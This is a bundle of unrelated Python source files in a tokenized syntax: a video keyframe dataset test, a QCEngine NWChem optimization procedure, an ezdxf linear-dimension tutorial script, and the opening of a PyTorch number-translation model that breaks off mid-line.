video_codec="mpeg4")<as>(fname data)<block_start>video_list=[fname]<line_sep>category_list=[<none>]<line_sep>dataset=VideoKeyframeDataset(video_list category_list)<line_sep>self.assertEqual(len(dataset) 1)<line_sep>data1,categories1=dataset[0]["images"] dataset[0]["categories"]<line_sep>self.assertEqual(data1.shape torch.Size((5 3 300 300)))<line_sep>self.assertEqual(data1.dtype torch.float32)<line_sep>self.assertIsNone(categories1[0])<line_sep><return><block_end>self.assertTrue(<false>)<block_end><def_stmt>test_read_keyframes_with_selector self<block_start><with_stmt>temp_video(60 300 300 5 video_codec="mpeg4")<as>(fname data)<block_start>video_list=[fname]<line_sep>category_list=[<none>]<line_sep>random.seed(0)<line_sep>frame_selector=RandomKFramesSelector(3)<line_sep>dataset=VideoKeyframeDataset(video_list category_list frame_selector)<line_sep>self.assertEqual(len(dataset) 1)<line_sep>data1,categories1=dataset[0]["images"] dataset[0]["categories"]<line_sep>self.assertEqual(data1.shape torch.Size((3 3 300 300)))<line_sep>self.assertEqual(data1.dtype torch.float32)<line_sep>self.assertIsNone(categories1[0])<line_sep><return><block_end>self.assertTrue(<false>)<block_end><def_stmt>test_read_keyframes_with_selector_with_transform self<block_start><with_stmt>temp_video(60 300 300 5 video_codec="mpeg4")<as>(fname data)<block_start>video_list=[fname]<line_sep>category_list=[<none>]<line_sep>random.seed(0)<line_sep>frame_selector=RandomKFramesSelector(1)<line_sep>transform=ImageResizeTransform()<line_sep>dataset=VideoKeyframeDataset(video_list category_list frame_selector transform)<line_sep>data1,categories1=dataset[0]["images"] dataset[0]["categories"]<line_sep>self.assertEqual(len(dataset) 1)<line_sep>self.assertEqual(data1.shape torch.Size((1 3 800 800)))<line_sep>self.assertEqual(data1.dtype torch.float32)<line_sep>self.assertIsNone(categories1[0])<line_sep><return><block_end>self.assertTrue(<false>)<block_end><block_end>
<import_from_stmt>typing Union Dict Any<import_from_stmt>qcelemental.models OptimizationInput AtomicInput OptimizationResult Provenance<import_from_stmt>qcengine.config TaskConfig<import_from_stmt>qcengine.exceptions UnknownError InputError<import_from_stmt>qcengine.procedures.nwchem_opt.harvester harvest_as_atomic_result<import_from_stmt>qcengine.programs.nwchem.runner NWChemHarness<import_from_stmt>qcengine.procedures.model ProcedureHarness<class_stmt>NWChemDriverProcedure(ProcedureHarness)<block_start>"""Structural relaxation using NWChem's optimizer"""<line_sep>_defaults={"name":"NWChemDriver" "procedure":"optimization"}<class_stmt>Config(ProcedureHarness.Config)<block_start><pass><block_end><def_stmt>found self raise_error:bool=<false><arrow>bool<block_start>nwc_harness=NWChemHarness()<line_sep><return>nwc_harness.found(raise_error)<block_end><def_stmt>get_version self<arrow>str<block_start>nwc_harness=NWChemHarness()<line_sep><return>nwc_harness.get_version()<block_end><def_stmt>build_input_model self data:Union[Dict[str Any] "OptimizationInput"]<arrow>OptimizationInput<block_start><return>self._build_model(data OptimizationInput)<block_end><def_stmt>compute self input_data:OptimizationInput config:TaskConfig<arrow>"BaseModel"<block_start>nwc_harness=NWChemHarness()<line_sep>self.found(raise_error=<true>)<line_sep># Unify the keywords from the OptimizationInput and QCInputSpecification # Optimization input will override, but don't tell users this as it seems unnecessary keywords=input_data.keywords.copy()<line_sep>keywords.update(input_data.input_specification.keywords)<if_stmt>keywords.get("program" "nwchem").lower()<ne>"nwchem"<block_start><raise>InputError("NWChemDriver procedure only works with NWChem")<block_end># Make an atomic input atomic_input=AtomicInput(molecule=input_data.initial_molecule driver="energy" keywords=keywords **input_data.input_specification.dict(exclude={"driver" "keywords"}) )<line_sep># Build the inputs for the job job_inputs=nwc_harness.build_input(atomic_input config)<line_sep># Replace the last line with a "task {} optimize" input_file:str=job_inputs["infiles"]["nwchem.nw"].strip()<line_sep>beginning,last_line=input_file.rsplit("\n" 1)<assert_stmt>last_line.startswith("task")<line_sep>last_line=f"task {last_line.split(' ')[1]} optimize"<line_sep>job_inputs["infiles"]["nwchem.nw"]=f"{beginning}\n{last_line}"<line_sep># Run it! success,dexe=nwc_harness.execute(job_inputs)<line_sep># Check for common errors <if_stmt>"There is an error in the input file"<in>dexe["stdout"]<block_start><raise>InputError(dexe["stdout"])<block_end><if_stmt>"not compiled"<in>dexe["stdout"]# recoverable with a different compilation with optional modules <block_start><raise>InputError(dexe["stdout"])<block_end># Parse it <if_stmt>success<block_start>dexe["outfiles"]["stdout"]=dexe["stdout"]<line_sep>dexe["outfiles"]["stderr"]=dexe["stderr"]<line_sep><return>self.parse_output(dexe["outfiles"] input_data)<block_end><else_stmt><block_start><raise>UnknownError(dexe["stdout"])<block_end><block_end><def_stmt>parse_output self outfiles:Dict[str str] input_model:OptimizationInput<arrow>OptimizationResult# Get the stdout from the calculation (required) <block_start>stdout=outfiles.pop("stdout")<line_sep>stderr=outfiles.pop("stderr")<line_sep># Parse out the atomic results from the file atomic_results=harvest_as_atomic_result(input_model stdout)<line_sep># Isolate the converged result final_step=atomic_results[-1]<line_sep><return>OptimizationResult(initial_molecule=input_model.initial_molecule input_specification=input_model.input_specification final_molecule=final_step.molecule trajectory=atomic_results energies=[float(r.extras["qcvars"]["CURRENT ENERGY"])<for>r atomic_results] stdout=stdout stderr=stderr success=<true> provenance=Provenance(creator="NWChemRelax" version=self.get_version() routine="nwchem_opt") )<block_end><block_end>
# Purpose: using DIMENSION horizontal, vertical and rotated # Copyright (c) 2018-2021, <NAME> # License: MIT License <import_from_stmt>typing TYPE_CHECKING<import_stmt>sys<import_stmt>math<import_stmt>pathlib<import_stmt>random<import_stmt>ezdxf<import_from_stmt>ezdxf.tools.standards setup_dimstyle<import_from_stmt>ezdxf.math Vec3 UCS<import_stmt>logging<if_stmt>TYPE_CHECKING<block_start><import_from_stmt>ezdxf.eztypes DimStyle DimStyleOverride<block_end># ======================================== # IMPORTANT: # this script uses f-strings (Python 3.6) # ======================================== <if_stmt>sys.version_info<l>(3 6)<block_start>print("This script requires Python 3.6 (f-strings)")<line_sep>sys.exit()<block_end># ======================================== # Setup logging # ======================================== logging.basicConfig(level="WARNING")<line_sep># ======================================== # Setup your preferred output directory # ======================================== OUTDIR=pathlib.Path("~/Desktop/Outbox").expanduser()<if_stmt><not>OUTDIR.exists()<block_start>OUTDIR=pathlib.Path()<block_end># ======================================== # Default text attributes # ======================================== TEXT_ATTRIBS={"height":0.25 "style":ezdxf.options.default_dimension_text_style }<line_sep>DIM_TEXT_STYLE=ezdxf.options.default_dimension_text_style<line_sep># ======================================================= # Discarding dimension rendering is possible # for BricsCAD, but is incompatible to AutoCAD -> error # ======================================================= BRICSCAD=<false><def_stmt>set_text_style doc textstyle=DIM_TEXT_STYLE name="EZDXF"<block_start><if_stmt>doc.dxfversion<eq>"AC1009"<block_start><return><block_end>dimstyle=doc.dimstyles.get(name)# type: DimStyle dimstyle.dxf.dimtxsty=textstyle<block_end><def_stmt>linear_tutorial dxfversion="R12"<block_start>doc=ezdxf.new(dxfversion setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>msp.add_line((0 0) (3 0))<line_sep>msp.add_line((0 7) (10 0))<line_sep># horizontal DIMENSION # Default DimStyle EZDXF: 1 drawing unit == 1m; scale 1: 100; length_factor=100 -> measurement in cm # # base: defines the dimension line, ezdxf accepts any point on the dimension line # p1: defines the start point of the first extension line, which also defines the first point to measure # p2: defines the start point of the second extension line, which also defines the second point to measure dim=msp.add_linear_dim(base=(3 2) p1=(0 0) p2=(3 0) dimstyle="EZDXF" override={"dimtxsty":"OpenSans"} )<line_sep># Necessary second step, to create the BLOCK entity with the DIMENSION geometry. # ezdxf supports DXF R2000 attributes for DXF R12 rendering, but they have to be applied by the DIMSTYLE override # feature, this additional attributes are not stored in the XDATA section of the DIMENSION entity, they are just # used to render the DIMENSION entity. # The return value `dim` is not a DIMENSION entity, instead a DimStyleOverride object is returned, the DIMENSION # entity is stored as dim.dimension, see also ezdxf.override.DimStyleOverride class. dim.render()<line_sep># rotated DIMENSION without `override` uses ezdxf.options.default_dimension_text_style (OpenSansCondensed-Light) # angle: defines the angle of the dimension line in relation to the x-axis of the WCS or UCS, measurement is the # distance between first and second measurement point in direction of `angle` dim2=msp.add_linear_dim(base=(10 2) p1=(7 0) p2=(10 0) angle=-30 dimstyle="EZDXF" override={"dimdle":0 "dimdec":2 "dimtfill":2 # custom text fill "dimtfillclr":4 # cyan } )<line_sep># type: DimStyleOverride # Some properties have setter methods for convenience, this is also the reason for not calling dim2.render() # automatically. dim2.set_arrows(blk=ezdxf.ARROWS.closed_filled size=0.25)<line_sep>dim2.set_text_align(halign="right")<line_sep>dim2.render()<line_sep>doc.set_modelspace_vport(height=5 center=(5 0))<line_sep>doc.saveas(OUTDIR/f"dim_linear_{dxfversion}_tutorial.dxf")<block_end><def_stmt>example_background_fill dxfversion="R12"<block_start>""" This example shows the background fill feature, ezdxf uses MTEXT for this feature and has no effect in DXF R12. """<line_sep>doc=ezdxf.new(dxfversion setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>msp.add_line((0 2.2) (10 2.2))<line_sep>dim=msp.add_linear_dim(base=(0 2) p1=(0 0) p2=(3 0) dimstyle="EZDXF" override={"dimtfill":1 # background color } )<line_sep># type: DimStyleOverride dim.set_text("bgcolor")<line_sep>dim.render()<line_sep>dim=msp.add_linear_dim(base=(0 2) p1=(5 0) p2=(8 0) dimstyle="EZDXF" override={"dimtfill":2 # custom text fill "dimtfillclr":4 # cyan } )<line_sep># type: DimStyleOverride dim.set_text("cyan")<line_sep>dim.render()<line_sep>doc.saveas(OUTDIR/f"background_fill_example_{dxfversion}.dxf")<block_end><def_stmt>example_for_all_text_placings_R12 <block_start>doc=ezdxf.new("R12" setup=<true>)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_R12.dxf")<block_end><def_stmt>example_for_all_text_placings_ucs_R12 <block_start>ucs=UCS(origin=(10 10 0) ux=(3 1 0) uz=(0 0 1))<line_sep>doc=ezdxf.new("R12" setup=<true>)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_ucs_R12.dxf" ucs)<block_end><def_stmt>example_for_all_text_placings_in_space_R12 <block_start>ucs=UCS(ux=(1 1 0) uy=(0 0 1))<line_sep>doc=ezdxf.new("R12" setup=<true>)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_in_space_R12.dxf" ucs)<block_end><def_stmt>example_for_all_text_placings_R2007 <block_start>doc=ezdxf.new("R2007" setup=<true>)<line_sep>set_text_style(doc)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_R2007.dxf")<block_end><def_stmt>example_for_all_text_placings_ucs_R2007 <block_start>ucs=UCS(origin=(10 10 0) ux=(3 1 0) uz=(0 0 1))<line_sep>doc=ezdxf.new("R2007" setup=<true>)<line_sep>set_text_style(doc)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_ucs_R2007.dxf" ucs)<block_end><def_stmt>example_for_all_text_placings_in_space_R2007 <block_start>ucs=(UCS(origin=(20 20 0)).rotate_local_x(math.radians(45)).rotate_local_z(math.radians(45)))<line_sep>doc=ezdxf.new("R2007" setup=<true>)<line_sep>set_text_style(doc)<line_sep>example_for_all_text_placings(doc "dim_linear_text_placing_in_space_R2007.dxf" ucs)<block_end><def_stmt>example_for_all_text_placings doc filename ucs=<none><block_start>""" This example shows many combinations of dimension text placing by `halign`, `valign` and user defined location override. Args: doc: DXF drawing filename: file name for saving ucs: user defined coordinate system """<def_stmt>add_text lines insert<block_start>insert<augadd>(0.2 0)<line_sep>attribs=dict(TEXT_ATTRIBS)<line_sep>line_space=0.4<line_sep>delta=Vec3(0 line_space 0)<for_stmt>line lines<block_start>text=msp.add_text(line dxfattribs=attribs).set_pos(insert)<if_stmt>ucs<block_start>text.transform(ucs.matrix)<block_end>insert<augsub>delta<block_end><block_end>msp=doc.modelspace()<line_sep>setup_dimstyle(doc name="TICK" fmt="EZ_M_100_H25_CM" style=DIM_TEXT_STYLE )<line_sep>setup_dimstyle(doc name="ARCHTICK" fmt="EZ_M_100_H25_CM" blk=ezdxf.ARROWS.architectural_tick style=DIM_TEXT_STYLE )<line_sep>setup_dimstyle(doc name="CLOSEDBLANK" fmt="EZ_M_100_H25_CM" blk=ezdxf.ARROWS.closed_blank style=DIM_TEXT_STYLE )<def_stmt>text dimstyle x y halign valign oblique=0<block_start>""" Default dimension text placing Args: dimstyle: dimstyle to use x: start point x y: start point y halign: horizontal text alignment - `left`, `right`, `center`, `above1`, `above2`, requires DXF R2000+ valign: vertical text alignment `above`, `center`, `below` oblique: angle of oblique extension line, 0 = orthogonal to dimension line """<line_sep>dimattr={}<if_stmt>oblique<block_start>dimattr["oblique_angle"]=oblique<block_end>base=(x y+2)<line_sep># wide dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+5 y) dimstyle=dimstyle dxfattribs=dimattr )<line_sep># type: DimStyleOverride dim.set_text_align(halign=halign valign=valign)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"halign={halign}" f"valign={valign}" f"oblique={oblique}"] insert=Vec3(x y) )<line_sep># narrow dim=msp.add_linear_dim(base=base p1=(x+7 y) p2=(x+7.3 y) dimstyle=dimstyle dxfattribs=dimattr )<line_sep># type: DimStyleOverride dim.set_text_align(halign=halign valign=valign)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep># arrows inside, text outside dim=msp.add_linear_dim(base=base p1=(x+10 y) p2=(x+10.9999 y) dimstyle=dimstyle override={"dimdec":2} dxfattribs=dimattr )<line_sep># type: DimStyleOverride dim.set_text_align(halign=halign valign=valign)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep># narrow and force text inside dim=msp.add_linear_dim(base=base p1=(x+14 y) p2=(x+14.3 y) dimstyle=dimstyle override={"dimtix":1} dxfattribs=dimattr )<line_sep># type: DimStyleOverride dim.set_text_align(halign=halign valign=valign)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<block_end><def_stmt>user_text_free dimstyle x=0 y=0 leader=<false><block_start>""" User defined dimension text placing. Args: dimstyle: dimstyle to use x: start point x y: start point y leader: use leader line if True """<line_sep>override={"dimdle":0.0 "dimexe":0.5 # length of extension line above dimension line "dimexo":0.5 # extension line offset "dimtfill":2 # custom text fill "dimtfillclr":4 # cyan }<line_sep>base=(x y+2)<line_sep>dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+3 y) dimstyle=dimstyle override=override )<line_sep># type: DimStyleOverride location=Vec3(x+3 y+3 0)<line_sep>dim.set_location(location leader=leader)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"usr absolute={location}" f"leader={leader}"] insert=Vec3(x y))<line_sep>x<augadd>4<line_sep>dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+3 y) dimstyle=dimstyle override=override )<line_sep># type: DimStyleOverride relative=Vec3(-1 +1)# relative to dimline center dim.set_location(relative leader=leader relative=<true>)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"usr relative={relative}" f"leader={leader}"] insert=Vec3(x y))<line_sep>x<augadd>4<line_sep>dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+3 y) dimstyle=dimstyle override=override )<line_sep># type: DimStyleOverride dh=-0.7<line_sep>dv=1.5<line_sep>dim.shift_text(dh dv)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"shift text=({dh}, {dv})" ] insert=Vec3(x y) )<line_sep>override["dimtix"]=1# force text inside x<augadd>4<line_sep>dim=msp.add_linear_dim(base=base p1=(x y) p2=(x+0.3 y) dimstyle=dimstyle override=override )<line_sep># type: DimStyleOverride dh=0<line_sep>dv=1<line_sep>dim.shift_text(dh dv)<line_sep>dim.render(ucs=ucs discard=BRICSCAD)<line_sep>add_text([f"shift text=({dh}, {dv})" ] insert=Vec3(x y) )<block_end>dimstyles=["TICK" "ARCHTICK" "CLOSEDBLANK"]<line_sep>xoffset=17<line_sep>yoffset=5<for_stmt>col,dimstyle enumerate(dimstyles)<block_start>row=0<for_stmt>halign ("center" "left" "right")<block_start>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign=halign valign="above" )<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign=halign valign="center" )<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign=halign valign="below" )<line_sep>row<augadd>1<block_end>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign="above1" valign="above" )<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign="above2" valign="above" )<line_sep>row<augadd>1<line_sep>user_text_free(dimstyle x=col<times>xoffset y=row<times>yoffset)<line_sep>row<augadd>1<line_sep>user_text_free(dimstyle x=col<times>xoffset y=row<times>yoffset leader=<true>)<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign="center" valign="above" oblique=70 )<line_sep>row<augadd>1<line_sep>text(dimstyle x=col<times>xoffset y=row<times>yoffset halign="above1" valign="above" oblique=80 )<line_sep>row<augadd>1<block_end>doc.saveas(OUTDIR/filename)<block_end><def_stmt>example_multi_point_linear_dimension <block_start>""" Example for using the ezdxf "multi-point linear dimension" feature, which generates dimension entities for multiple points at ones and tries to move dimension text to a readable location. This feature works best with DXF R2007+. """<line_sep>doc=ezdxf.new("R2007" setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>points=[(0 0) (5 1) (5.2 1) (5.4 0) (7 0) (10 3)]<line_sep>msp.add_lwpolyline(points)<line_sep># create quick a new DIMSTYLE as alternative to overriding DIMSTYLE attributes dimstyle=doc.dimstyles.duplicate_entry("EZDXF" "WITHTFILL")<line_sep># type: DimStyle dimstyle.dxf.dimtfill=1<line_sep>msp.add_multi_point_linear_dim(base=(0 5) points=points dimstyle="WITHTFILL")<line_sep>doc.saveas(OUTDIR/f"multi_point_linear_dim_R2007.dxf")<block_end><def_stmt>random_point start end<block_start>dist=end-start<line_sep><return>Vec3(start+random.random()<times>dist start+random.random()<times>dist)<block_end><def_stmt>example_random_multi_point_linear_dimension count=10 length=20 discard=BRICSCAD<block_start>""" Example for using the ezdxf "multi-point linear dimension" feature, which generates dimension entities for multiple points at ones and tries to move dimension text to a readable location. This feature works best with DXF R2007+. """<line_sep>doc=ezdxf.new("R2007" setup=<true>)<line_sep>msp=doc.modelspace()<line_sep># create a random polyline. points=[random_point(0 length)<for>_ range(count)]<line_sep>msp.add_lwpolyline(points dxfattribs={"color":1})<line_sep># create quick a new DIMSTYLE as alternative to overriding DIMSTYLE attributes dimstyle=doc.dimstyles.duplicate_entry("EZDXF" "WITHTFILL")<line_sep># type: DimStyle dimstyle.dxf.dimtfill=1<line_sep>dimstyle.dxf.dimdec=2<line_sep>dimstyle=doc.dimstyles.duplicate_entry("WITHTFILL" "WITHTXT")<line_sep># type: DimStyle dimstyle.dxf.dimblk=ezdxf.ARROWS.closed<line_sep>dimstyle.dxf.dimtxsty="STANDARD"<line_sep>dimstyle.dxf.dimrnd=0.5<line_sep>dimstyle.set_text_align(valign="center")<line_sep>msp.add_multi_point_linear_dim(base=(0 length+2) points=points dimstyle="WITHTFILL" discard=discard )<line_sep>msp.add_multi_point_linear_dim(base=(-2 0) points=points angle=90 dimstyle="WITHTFILL" discard=discard )<line_sep>msp.add_multi_point_linear_dim(base=(10 -10) points=points angle=45 dimstyle="WITHTXT" discard=discard )<line_sep>doc.saveas(OUTDIR/f"multi_random_point_linear_dim_R2007.dxf")<block_end><def_stmt>linear_all_arrow_style version="R12" dimltype=<none> dimltex1=<none> dimltex2=<none> filename=""<block_start>""" Show all AutoCAD standard arrows on a linear dimension. Args: version: DXF version dimltype: dimension linetype dimltex1: linetype for first extension line dimltex2: linetype for second extension line filename: filename for saving """<line_sep>doc=ezdxf.new(version setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>ezdxf_dimstyle=doc.dimstyles.get("EZDXF")# type: DimStyle ezdxf_dimstyle.copy_to_header(doc)<for_stmt>index,name enumerate(sorted(ezdxf.ARROWS.__all_arrows__))<block_start>y=index<times>4<line_sep>attributes={"dimtxsty":"LiberationMono" "dimdle":0.5 }<if_stmt>dimltype<block_start>attributes["dimltype"]=dimltype<block_end><if_stmt>dimltex1<block_start>attributes["dimltex1"]=dimltex1<block_end><if_stmt>dimltex2<block_start>attributes["dimltex2"]=dimltex2<block_end>dim=msp.add_linear_dim(base=(3 y+2) p1=(0 y) p2=(3 y) dimstyle="EZDXF" override=attributes )<line_sep># type: DimStyleOverride dim.set_arrows(blk=name size=0.25)<line_sep>dim.render()<block_end><if_stmt><not>filename<block_start>filename="all_arrow_styles_dim_{}.dxf".format(version)<block_end>doc.saveas(OUTDIR/filename)<block_end><def_stmt>linear_tutorial_using_tolerances version="R2000"<block_start>""" Shows usage of tolerances for the dimension text. ezdxf uses MTEXT features for tolerance rendering and therefore requires DXF R2000+, but if you are using a friendly CAD application like BricsCAD, you can let the CAD application do the rendering job, be aware this files are not AutoCAD compatible. Args: version: DXF version """<line_sep>doc=ezdxf.new(version setup=<true>)<line_sep>msp=doc.modelspace()<line_sep># DO NOT RENDER BY EZDXF for DXF R12 discard=version<eq>"R12"<line_sep>tol_style=doc.dimstyles.duplicate_entry("EZDXF" "TOLERANCE")<line_sep># type: DimStyle # not all features are supported by DXF R12: # zero suppression (DIMTZIN), align (DIMTOLJ) and dec (DIMTDEC) require DXF R2000+ tol_style.set_tolerance(0.1 hfactor=0.5 align="top" dec=2)<line_sep>msp.add_linear_dim(base=(0 3) p1=(0 0) p2=(10 0) dimstyle="tolerance").render(discard=discard)<line_sep>dim=msp.add_linear_dim(base=(0 3) p1=(15 0) p2=(15.5 0) dimstyle="tolerance")<line_sep># set tolerance attributes by dim style override dim.set_tolerance(0.1 0.15 hfactor=0.4 align="middle" dec=2)<line_sep>dim.render(discard=discard)<line_sep>doc.saveas(OUTDIR/f"dimensions_with_tolerance_{version}.dxf")<block_end><def_stmt>linear_tutorial_using_limits version="R2000"<block_start>""" Shows usage of limits for the dimension text, limits are the lower and upper limit for the measured distance, the measurement itself is not shown. ezdxf uses MTEXT features for limits rendering and therefore requires DXF R2000+, but if you are using a friendly CAD application like BricsCAD, you can let the CAD application do the rendering job, be aware this files are not AutoCAD compatible. Args: version: DXF version """<line_sep>doc=ezdxf.new(version setup=<true>)<line_sep>msp=doc.modelspace()<line_sep># DO NOT RENDER BY EZDXF for DXF R12 discard=version<eq>"R12"<line_sep>tol_style=doc.dimstyles.duplicate_entry("EZDXF" "LIMITS")<line_sep># type: DimStyle # not all features are supported by DXF R12: # zero suppression (DIMTZIN), align (DIMTOLJ) and dec (DIMTDEC) require DXF R2000+ tol_style.set_limits(upper=0.1 lower=0.1 hfactor=0.5 dec=2)<line_sep>msp.add_linear_dim(base=(0 3) p1=(0 0) p2=(10 0) dimstyle="limits").render(discard=discard)<line_sep>msp.add_linear_dim(base=(0 3) p1=(15 0) p2=(15.5 0) dimstyle="limits").render(discard=discard)<line_sep>doc.saveas(OUTDIR/f"dimensions_with_limits_{version}.dxf")<block_end><def_stmt>linear_tutorial_using_tvp <block_start>""" For the vertical text alignment `center`, exists an additional DXF feature, to move the dimension text vertical up and down (DIMTVP). Vertical distance dimension line to text center = text_height * vshift (DIMTVP) """<line_sep>doc=ezdxf.new("R2000" setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>style=doc.dimstyles.duplicate_entry("EZDXF" "TVP")# type: DimStyle # shift text upwards style.set_text_align(valign="center" vshift=2.0)<line_sep>msp.add_linear_dim(base=(0 3) p1=(0 0) p2=(10 0) dimstyle="TVP").render()<line_sep>msp.add_linear_dim(base=(0 3) p1=(15 0) p2=(15.5 0) dimstyle="TVP").render()<line_sep>style=doc.dimstyles.duplicate_entry("EZDXF" "TVP2")# type: DimStyle # shift text downwards style.set_text_align(valign="center" vshift=-2.0)<line_sep>msp.add_linear_dim(base=(0 7) p1=(0 5) p2=(10 5) dimstyle="TVP2").render()<line_sep>msp.add_linear_dim(base=(0 7) p1=(15 5) p2=(15.5 5) dimstyle="TVP2").render()<line_sep>doc.saveas(OUTDIR/"dimensions_with_dimtvp.dxf")<block_end><def_stmt>linear_tutorial_ext_lines <block_start>doc=ezdxf.new("R12" setup=<true>)<line_sep>msp=doc.modelspace()<line_sep>msp.add_line((0 0) (3 0))<line_sep>attributes={"dimexo":0.5 "dimexe":0.5 "dimdle":0.5 "dimblk":ezdxf.ARROWS.none "dimclrt":3 }<line_sep>msp.add_linear_dim(base=(3 2) p1=(0 0) p2=(3 0) dimstyle="EZDXF" override=attributes).render()<line_sep>attributes={"dimtad":4 "dimclrd":2 "dimclrt":4 }<line_sep>msp.add_linear_dim(base=(10 2) p1=(7 0) p2=(10 0) angle=-30 dimstyle="EZDXF" override=attributes ).render()<line_sep>msp.add_linear_dim(base=(3 5) p1=(0 10) p2=(3 10) dimstyle="EZDXF" override=attributes ).render()<line_sep>doc.saveas(OUTDIR/"dim_linear_R12_ext_lines.dxf")<block_end><def_stmt>linear_EZ_M fmt<block_start>doc=ezdxf.new("R12" setup=("linetypes" "styles"))<line_sep>msp=doc.modelspace()<line_sep>ezdxf.setup_dimstyle(doc fmt)<line_sep>msp.add_line((0 0) (1 0))<line_sep>msp.add_linear_dim(base=(0 1) p1=(0 0) p2=(1 0) dimstyle=fmt).render()<line_sep>doc.saveas(OUTDIR/f"dim_linear_R12_{fmt}.dxf")<block_end><def_stmt>linear_EZ_CM fmt<block_start>doc=ezdxf.new("R12" setup=("linetypes" "styles"))<line_sep>msp=doc.modelspace()<line_sep>ezdxf.setup_dimstyle(doc fmt)<line_sep>msp.add_line((0 0) (100 0))<line_sep>msp.add_linear_dim(base=(0 100) p1=(0 0) p2=(100 0) dimstyle=fmt).render()<line_sep>doc.saveas(OUTDIR/f"dim_linear_R12_{fmt}.dxf")<block_end><def_stmt>linear_EZ_MM fmt<block_start>doc=ezdxf.new("R12" setup=("linetypes" "styles"))<line_sep>msp=doc.modelspace()<line_sep>ezdxf.setup_dimstyle(doc fmt)<line_sep>msp.add_line((0 0) (1000 0))<line_sep>msp.add_linear_dim(base=(0 1000) p1=(0 0) p2=(1000 0) dimstyle=fmt).render()<line_sep>doc.saveas(OUTDIR/f"dim_linear_R12_{fmt}.dxf")<block_end>ALL=<true><if_stmt>__name__<eq>"__main__"<block_start>example_for_all_text_placings_ucs_R12()<line_sep>example_for_all_text_placings_in_space_R12()<line_sep>example_for_all_text_placings_ucs_R2007()<line_sep>example_for_all_text_placings_in_space_R2007()<if_stmt>ALL<block_start>linear_tutorial("R2007")<line_sep>linear_tutorial_using_tvp()<line_sep>linear_tutorial_using_limits("R2000")<line_sep>linear_tutorial_using_limits("R12")<line_sep>linear_tutorial_using_tolerances("R2000")<line_sep>linear_tutorial_using_tolerances("R12")<line_sep>linear_tutorial("R2007")<line_sep>linear_tutorial("R12")<line_sep>example_background_fill("R2007")<line_sep>example_for_all_text_placings_R12()<line_sep>example_for_all_text_placings_R2007()<line_sep>example_multi_point_linear_dimension()<line_sep>example_random_multi_point_linear_dimension(count=10 length=20)<line_sep>linear_all_arrow_style("R12")<line_sep>linear_all_arrow_style("R12" dimltex1="DOT2" dimltex2="DOT2" filename="dotted_extension_lines_R12.dxf" )<line_sep>linear_all_arrow_style("R2000")<line_sep>linear_all_arrow_style("R2007" dimltex1="DOT2" dimltex2="DOT2" filename="dotted_extension_lines_R2007.dxf" )<line_sep>linear_tutorial_ext_lines()<line_sep>linear_EZ_M("EZ_M_100_H25_CM")<line_sep>linear_EZ_M("EZ_M_1_H25_CM")<line_sep>linear_EZ_CM("EZ_CM_100_H25_CM")<line_sep>linear_EZ_CM("EZ_CM_1_H25_CM")<line_sep>linear_EZ_MM("EZ_MM_100_H25_MM")<line_sep>linear_EZ_MM("EZ_MM_1_H25_MM")<block_end><block_end>
<import_stmt>torch<import_from_stmt>..abstract ExtendedTorchModule<import_from_stmt>..layer GeneralizedLayer GeneralizedCell<class_stmt>NumberTranslationNetwork(ExtendedTorchModule)<block_start>UNIT_NAMES=GeneralizedCell.UNIT_NAMES<def_stmt>__init__ self unit_name embedding_size=2 # 1 for the number, 1 for the gate ? hidden_size=2 # 1 for the number, 1 for the gate ? dictionary_size=30 writer=<none> **kwags<block_start>super().__init__('network' writer=writer **kwags)<line_sep>self.unit_name=unit_name<line_sep>self.embedding_size=embedding_size<line_sep>self.hidden_size=hidden_size<line_sep>self.dictionary_size=dictionary_size<line_sep>self.register_buffer('lstm_zero_state_h' torch.Tensor(hidden_size))<line_sep>self.register_buffer('lstm_zero_state_c' torch.Tensor(hidden_size))<line_sep>self.register_buffer('output_zero_state' torch.Tensor(1))<line_sep>self.embedding=torch.nn.Embedding(dictionary_size embedding_size)<line_sep>self.lstm_cell=torch.nn.LSTMCell(embedding_size hidden_size)<line_sep>self.output_cell=GeneralizedCell(hidden_size 1 unit_name writer=self.writer name='recurrent_output' **kwags)<line_sep>self.reset_parameters()<block_end><def_stmt>reset_parameters self<block_start>torch.nn.init.zeros_(self.lstm_zero_state_h)<line_sep>torch.nn.init.zeros_(self.lstm_zero_state_c)<line_sep>torch.nn.init.zeros_(self.output_zero_state)<line_sep>self.embedding.reset_parameters()<line_sep>self.lstm_cell.reset_parameters()<line_sep>self.output_cell.reset_parameters()<block_end><def_stmt>forward self x<block_start>"""Performs recurrent iterations over the input. Arguments: input: Expected to have the shape [obs, time] """<line_sep># Perform recurrent iterations over the input h_1_tm1=self.lstm_zero_state_h.repeat(x.size(0) 1)<line_sep>c_1_tm1=self.lstm_zero_state_c.repeat(x.size(0) 1)<line_sep>h_2_tm1=self.output_zero_state.repeat(x.size(0) 1)<for_stmt>t range(x.size(1))<block_start>x_t=x[: 